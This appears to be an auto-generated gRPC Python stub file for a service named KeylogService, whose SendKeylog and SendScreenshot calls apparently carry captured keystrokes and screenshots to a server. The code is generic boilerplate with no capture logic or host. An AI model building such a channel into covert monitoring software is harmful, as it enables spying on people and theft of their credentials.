# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
import warnings

from . import server_pb2 as server__pb2

GRPC_GENERATED_VERSION = '1.76.0'
GRPC_VERSION = grpc.__version__
_version_not_supported = False

try:
    from grpc._utilities import first_version_is_lower
    _version_not_supported = first_version_is_lower(GRPC_VERSION, GRPC_GENERATED_VERSION)
except ImportError:
    _version_not_supported = True

if _version_not_supported:
    raise RuntimeError(
        f'The grpc package installed is at version {GRPC_VERSION},'
        + ' but the generated code in server_pb2_grpc.py depends on'
        + f' grpcio>={GRPC_GENERATED_VERSION}.'
        + f' Please upgrade your grpc module to grpcio>={GRPC_GENERATED_VERSION}'
        + f' or downgrade your generated code using grpcio-tools<={GRPC_VERSION}.'
    )


class KeylogServiceStub(object):
    """Missing associated documentation comment in .proto file."""

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.SendKeylog = channel.unary_unary(
                '/KeylogService/SendKeylog',
                request_serializer=server__pb2.KeylogRequest.SerializeToString,
                response_deserializer=server__pb2.KeylogResponse.FromString,
                _registered_method=True)
        self.SendScreenshot = channel.unary_unary(
                '/KeylogService/SendScreenshot',
                request_serializer=server__pb2.ScreenshotRequest.SerializeToString,
                response_deserializer=server__pb2.ScreenshotResponse.FromString,
                _registered_method=True)


class KeylogServiceServicer(object):
    """Missing associated documentation comment in .proto file."""

    def SendKeylog(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def SendScreenshot(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_KeylogServiceServicer_to_server(servicer, server):
    rpc_method_handlers = {
            'SendKeylog': grpc.unary_unary_rpc_method_handler(
                    servicer.SendKeylog,
                    request_deserializer=server__pb2.KeylogRequest.FromString,
                    response_serializer=server__pb2.KeylogResponse.SerializeToString,
            ),
            'SendScreenshot': grpc.unary_unary_rpc_method_handler(
                    servicer.SendScreenshot,
                    request_deserializer=server__pb2.ScreenshotRequest.FromString,
                    response_serializer=server__pb2.ScreenshotResponse.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'KeylogService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
    server.add_registered_method_handlers('KeylogService', rpc_method_handlers)


 # This class is part of an EXPERIMENTAL API.
class KeylogService(object):
    """Missing associated documentation comment in .proto file."""

    @staticmethod
    def SendKeylog(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(
            request,
            target,
            '/KeylogService/SendKeylog',
            server__pb2.KeylogRequest.SerializeToString,
            server__pb2.KeylogResponse.FromString,
            options,
            channel_credentials,
            insecure,
            call_credentials,
            compression,
            wait_for_ready,
            timeout,
            metadata,
            _registered_method=True)

    @staticmethod
    def SendScreenshot(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(
            request,
            target,
            '/KeylogService/SendScreenshot',
            server__pb2.ScreenshotRequest.SerializeToString,
            server__pb2.ScreenshotResponse.FromString,
            options,
            channel_credentials,
            insecure,
            call_credentials,
            compression,
            wait_for_ready,
            timeout,
            metadata,
            _registered_method=True)
